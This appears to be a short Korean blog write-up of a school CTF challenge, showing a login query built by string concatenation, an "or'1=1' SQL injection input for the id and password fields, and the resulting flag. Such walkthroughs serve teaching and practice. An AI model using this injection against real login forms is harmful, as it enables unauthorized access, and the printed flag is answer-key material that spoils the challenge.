반응형
!! 현재 문제는 경북소프트웨어고등학교의 CTF 사이트에서 출제된 문제입니다.
문제는 참고만 부탁드립니다. !!
[문제]
[풀이]
SQL Injection 공격 기법을 이용해서 푸는 문제입니다.
SELECT * FROM users WHERE id="' + id + '" AND pw="' + pw + '"'
id 부분와 pw에 들어가는 부분은 SQL Injection 공격 기법에 맞게 제출하면 Flag 값을 확인할 수 있다.
SELECT * FROM users WHERE id="' + "or'1=1' + '" AND pw="' + "or'1=1' + '"'
위처럼 입력해준다.
Flag 값이 나온다.
[FLAG]
rceCTF{we1C0M3_To_Sql_inj3ct1oN}
반응형